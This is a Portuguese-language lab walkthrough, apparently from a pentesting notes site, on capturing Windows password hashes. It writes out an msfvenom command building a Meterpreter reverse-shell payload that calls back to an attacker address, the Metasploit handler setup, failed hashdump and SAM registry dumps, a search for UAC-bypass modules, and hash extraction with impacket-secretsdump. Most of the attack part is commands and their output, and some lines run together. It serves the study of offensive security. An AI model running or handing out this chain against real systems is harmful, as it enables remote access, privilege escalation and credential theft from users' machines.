Obtendo hashes em sistemas modernos
Para começar, vamos criar um laboratório propício para iniciar os métodos de captura de hashes. Nesse caso não temos acesso privilegiado no sistema.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.134 lport=443 -f exe > arq.exeuse exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <lhost>
set LPORT <lport>
exploitPodemos tentar executar o hashdump porém como não temos acesso privilegiado, não será possível.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.Vamos tentar realizar uma função administrativa como, por exemplo salvar o SAM direto do registro. (hkml = HKEY-LOCAL-MACHINE)
C:\>reg save hklm\sam arqSam
ERROR: Access is denied.Dá acesso negado, então é necessário escalar para um privilégio administrativo para que isso seja possível.
Vamos então procurar módulos para dar bypass no UAC (User Account Control). Para isso podemos usar o background sem matar a sessão.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-MJHCOMS\trzwo @ DESKTOP-MJHCOM 192.168.2.134:666 -> 192.168.2.137:612
S 48 (192.168.2.137)
msf6 exploit(multi/handler) > search uacCom isso, conseguimos dar bypass no UAC e obter os arquivos.
Com os dois arquivos, SAM e system, conseguimos as hashes utilizando o impacket-secretsdump
O mesmo ocorre se utilizarmos o hashdump do meterpreter também.
Last updated
Was this helpful?